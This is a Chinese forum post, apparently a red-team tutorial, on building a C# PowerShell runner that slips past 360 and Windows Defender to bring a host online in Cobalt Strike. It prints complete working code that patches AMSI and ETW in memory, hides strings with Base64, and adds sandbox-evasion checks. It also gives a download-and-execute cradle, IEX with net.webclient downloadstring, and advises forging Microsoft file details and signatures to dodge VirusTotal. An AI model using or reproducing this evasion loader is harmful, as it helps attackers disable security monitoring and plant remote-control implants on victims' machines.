PowerShell无文件落地绕过杀软上线CS

alyssa · 发表于 2023-12-1 21:58:54

前言

PowerShell 是一种跨平台（Windows、Linux 和 macOS）的自动化工具和配置框架，由微软开发。它包含了一个命令行shell、脚本语言和配置管理框架。PowerShell 是基于 .NET 框架构建的，这使它具有强大的功能和灵活性。

无文件落地免杀技术就是通过PowerShell来实现的，PowerShell脚本可以在内存中执行，而无需在磁盘上创建实际的文件。这使得它们难以被传统的基于文件的安全解决方案（如杀毒软件）检测到，所以PowerShell深受攻击者的喜爱。正因如此，杀软对powershell执行脚本查杀比较严格。本文主要针对PowerShell上线CS进行一系列的免杀尝试。

免杀过程

未进行处理直接执行powershell命令，会被杀软拦截

通过进程查看工具，发现PowerShell运行时加载了System.Management.Automation.ni.dll这个dll，System.Management.Automation.ni.dll是预编译版本的 System.Management.Automation.dll，而PowerShell加载脚本的实现就是基于这个dll

本次免杀的方式也是基于这个dll，自写PowerShell工具来实现对脚本的加载从而上线CS。首先通过vs创建一个.net控制台应用，在项目中添加引用，把这个dll引用进来，dll的路径可以通过everything工具获取，我这里的路径是 C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35

接下来编写代码，实现对脚本的加载，参考代码如下

using System;using System.Management.Automation;using System.Management.Automation.Runspaces;using System.Collections.ObjectModel;using System.Runtime.InteropServices;using System.Text;using System.Collections.Generic;
namespace MyPowershell{ class Program { // 使用DllImport属性导入kernel32.dll中的GetProcAddress函数，用于获取指定模块的函数或变量的地址。 [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
// 导入kernel32.dll中的LoadLibrary函数，用于加载指定的动态链接库，并返回库的句柄。 [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name);
// 导入kernel32.dll中的VirtualProtect函数，用于改变指定内存区域的保护属性。 [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
// 用于将byte数组中的数据复制到指定的内存地址中。 private static void copy(Byte[] Patch, IntPtr Address) { Marshal.Copy(Patch, 0, Address, 6); }
// 此方法通过修改AmsiScanBuffer函数来bypass AMSI检测。 public static void chaching() { // 加载amsi.dll IntPtr Library = LoadLibrary("a" + "m" + "s" + "i" + ".dll"); // 获取AmsiScanBuffer函数的地址 IntPtr Address = GetProcAddress(Library, "Amsi" + "Scan" + "Buffer"); uint p; // 修改AmsiScanBuffer函数的内存保护属性 VirtualProtect(Address, (UIntPtr)5, 0x40, out p); // 准备新的函数字节码 Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // 将新的函数字节码复制到AmsiScanBuffer函数的地址 copy(Patch, Address); Console.WriteLine("Patch Applied"); }
static void Main(String[] args) { // 如果命令行参数为空，结束程序运行 if (args.Length == 0) Environment.Exit(1);
// 判断系统的进程数是否小于40，如果小于40则退出程序(用来反defender的沙箱) if (Process.GetProcesses().Length < 40) { Console.WriteLine("The number of processes in the system is less than 40. Exiting the program."); Environment.Exit(0); }
List<string> argsList = new List<string>(args);
// 如果命令行参数中包含“-s”，则执行bypass amsi的操作 if (argsList.Contains("-s")) { chaching(); argsList.Remove("-s"); //从参数数组中移除"-s" }
// 对传入的Base64编码的字符串进行解码 string temp = Base64Decode(argsList[0]); // 运行解码后的PowerShell脚本，并将执行结果输出到控制台 string s = RunScript(temp); Console.WriteLine(s); Console.ReadKey(); }
// Base64解码函数 public static string Base64Decode(string s) { return System.Text.Encoding.Default.GetString(System.Convert.FromBase64String(s)); }
// 运行PowerShell脚本并返回执行结果的函数 private static string RunScript(string script) { // 创建并打开一个运行空间，用于运行PowerShell命令 Runspace MyRunspace = RunspaceFactory.CreateRunspace(); MyRunspace.Open();
// 在运行空间中创建一个管道，用于存放待执行的PowerShell命令 Pipeline MyPipeline = MyRunspace.CreatePipeline(); // 在管道中添加PowerShell命令 MyPipeline.Commands.AddScript(script); // 在管道中添加输出命令，使得PowerShell命令的执行结果能被程序获取 MyPipeline.Commands.Add("Out-String");
// 调用管道中的PowerShell命令，并获取执行结果 Collection<PSObject> outputs = MyPipeline.Invoke(); // 关闭运行空间 MyRunspace.Close();
// 将执行结果转换为字符串 StringBuilder sb = new StringBuilder(); foreach (PSObject pobject in outputs) { sb.AppendLine(pobject.ToString()); }
return sb.ToString(); } }}

复制代码

这个代码中加入了对defender的反沙箱检测，就是这部分

// 判断系统的进程数是否小于40，如果小于40则退出程序(用来反defender的沙箱)if (Process.GetProcesses().Length < 40){ Console.WriteLine("The number of processes in the system is less than 40. Exiting the program."); Environment.Exit(0);}

复制代码

加载脚本的函数实现在RunScript部分，主要对从命令行接受到的参数进行base64解密，然后执行脚本，这个代码中还加入了绕过amsi检测的代码，AMSI（Antimalware Scan Interface）是由微软开发的一个开放的接口，用于增强恶意软件和其他威胁的检测和防护能力。国内杀软目前没有集成amsi，这里主要为了绕过defender，defender会利用amsi查杀恶意程序。未对amsi进行处理时，执行命令会被defender拦截

使用上面的代码编译好的工具可以绕过360的检测上线CS，如下

但是无法在defender环境运行，工具丢进去就会被杀

经过不过测试，发现defender查杀了绕过amsi的代码，检测了amsi.dll和AmsiScanBuffer,接下来就是尝试对代码进行修改从而绕过defender的检测，最后发现对字符串进行编码处理可以绕过defender的查杀，修改后的代码如下

public static void chaching() { // 加载amsi.dll string base64Encoded = "YW1zaS5kbGw="; // "ntdll.dll" 的 Base64 编码 string libraryName = Encoding.UTF8.GetString(Convert.FromBase64String(base64Encoded)); IntPtr Library = LoadLibrary(libraryName);
if (Library == IntPtr.Zero) { Console.WriteLine("Failed to load library."); return; }
// 获取AmsiScanBuffer函数的地址 string base64Encoded1 = "QW1zaVNjYW5CdWZmZXI="; string functionName = Encoding.UTF8.GetString(Convert.FromBase64String(base64Encoded1)); Console.WriteLine(functionName); IntPtr Address = GetProcAddress(Library, functionName);
if (Address == IntPtr.Zero) { Console.WriteLine("Failed to get function address."); return; }
uint p; // 修改AmsiScanBuffer函数的内存保护属性 VirtualProtect(Address, (UIntPtr)5, 0x40, out p);
// 准备新的函数字节码 Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // 将新的函数字节码复制到AmsiScanBuffer函数的地址 copy(Patch, Address);
Console.WriteLine("Patch Applied"); }

复制代码

这个时候编译的程序已不会被defender静态查杀，基本的免杀差不多了，但是考虑到etw的检测，需要对代码进一步处理。ETW（Event Tracing for Windows）是微软 Windows 操作系统中的一个强大的跟踪和日志记录功能。它用于监控和记录系统和应用程序的运行情况，包括性能数据、系统或应用程序的操作信息等。

经过大佬们的研究，etw是什么东西呢？可以通过进程查看工具Process Hacker去查看.net程序如下

这个东西就是etw记录的一些日志，里面会记录一些程序的行为，某些安全设备可能会基于etw的日志去进行流量分析从而告警。所以etw最好也给它干掉，实现代码如下

public static void etw() { try { IntPtr Library = LoadLibrary("n" + "t" + "d" + "l" + "l" + ".dll"); IntPtr Address = GetProcAddress(Library, "Etw" + "Event" + "Write"); uint oldProtect; bool protectResult = VirtualProtect(Address, (UIntPtr)1, 0x40, out oldProtect); Byte[] Patch = { 0xC3 }; // RET 指令 Marshal.Copy(Patch, 0, Address, Patch.Length);
Console.WriteLine("ETW Patch Applied"); } catch (Exception ex) { Console.WriteLine("Exception occurred: " + ex.Message); } }

复制代码

干掉etw和amsi的代码实现原理都一样，通过替换关键函数入口的前几个字节让函数不生效，这里替换的0xC3对应的汇编指令是RET，当代码执行到函数时就会直接返回，从而绕过etw和amsi的检测。做完上面这些编译好的工具已经可以成功在360和defender环境上线了，但是放到微步在线云沙箱和VT上效果并不是很好，特别是微步竟然识别成木马了

这肯定不能到此为止了，继续处理，怀疑这个引擎可能识别了我的RunScript函数，于是对RunScript函数进行替换，代码如下

public static string RunScript(string script) { using (PowerShell powerShellInstance = PowerShell.Create()) { // 使用 AddScript 方法添加要执行的 PowerShell 脚本 powerShellInstance.AddScript(script);
// 执行脚本并收集结果 Collection<PSObject> psOutput = powerShellInstance.Invoke();
StringBuilder stringBuilder = new StringBuilder(); foreach (PSObject outputItem in psOutput) { // 如果有结果，则将其添加到 StringBuilder if (outputItem != null) { stringBuilder.AppendLine(outputItem.BaseObject.ToString()); } }
return stringBuilder.ToString(); } }

复制代码

再次编译，微步已无法识别问题

另外发现微步云沙箱好像被我的工具玩坏了，引擎检出信息无法获取到了，哈哈

不知道是bug还是怎么回事，检测时间特别久，然后结果就是这样子。对了另外对反沙箱代码进行了调整，删去了原有的反沙箱代码，还是判断当前目录是否存在1.txt文件，存在则执行main函数代码，否则退出。代码如下

// 检查当前目录下是否存在 1.txt 文件if (!File.Exists(Path.Combine(Directory.GetCurrentDirectory(), "1.txt"))){ Environment.Exit(0);}

复制代码

对代码重新进行编译，添加详细信息、图标、签名等，这里稍微注意下，添加不同的详细信息和签名在VT平台免杀效果是不一样的，实测这个工具来说添加微软的详细信息和签名免杀效果最好，最终效果如下

上线CS

生成32位的powershell脚本，把脚本放到cs站点上

对payload进行base64编码，payload：IEX ((new-object net.webclient).downloadstring('访问ps脚本url'))

在目标主机通过工具执行命令，用法：

-s 绕过amsi
-t 绕过etw

复制代码

360和defender上线情况：

总结

1.免杀需要耐心，不断测试，从而发现杀软查杀的特征，进而绕过。
2.powershell免杀工具可以公众号回复powershell获取。

		自动登录	找回密码
密码			立即注册

PowerShell无文件落地绕过杀软上线CS

本帖子中包含更多资源